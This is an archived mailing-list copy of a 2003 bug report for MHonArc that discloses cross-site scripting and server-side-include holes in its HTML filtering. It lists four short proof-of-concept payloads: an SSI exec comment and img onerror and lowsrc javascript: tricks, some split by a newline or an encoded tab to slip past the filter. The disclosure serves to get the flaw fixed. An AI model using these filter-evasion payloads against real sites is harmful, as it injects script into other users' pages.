mhonarc-dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Bug #3128] XSS Vulnerabilies

2003-04-05 16:54:47
from [nobody] [Permanent Link] 
=================== BUG #3128: FULL BUG SNAPSHOT ===================
http://savannah.nongnu.org/bugs/?func=detailbug&bug_id=3128&group_id=1968

Submitted by: ehood                   Project: MHonArc                      
Submitted on: Sat 04/05/2003 at 17:54
Category:  MIME Filter                Severity:  5 - Major                  
Bug Group:  Security                  Resolution:  None                     
Assigned to:  None                    Status:  Open                         
Platform Version:  All                Perl Version:  All                    
Component Version:  <=2.6.2           Fixed Release:                        

Summary:  XSS Vulnerabilies

Original Submission:  Copied from private message:

The following constructs all came out as working javascript or SSI
directives after I installed mhonarc v2.6.2 and ran them through
mhonarc -single:


<!-<link>-#exec foo -->

<img src=foo onerror="alert(1)">

<img lowsrc="javas
cript:alert(2)">

<img lowsrc="javas&#9;cript:alert(3)">




No Followups Have Been Posted


CC list is empty


No files currently attached


For detailed info, follow this link:
http://savannah.nongnu.org/bugs/?func=detailbug&bug_id=3128&group_id=1968

---------------------------------------------------------------------
To sign-off this list, send email to majordomo(_at_)mhonarc(_dot_)org with the
message text UNSUBSCRIBE MHONARC-DEV
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
Next by Date:  [Bug #3020] Trailing \ in regex, nobody
Next by Thread:  [Bug #3128] XSS Vulnerabilies, nobody
Indexes:  [Date] [Thread] [Top] [All Lists]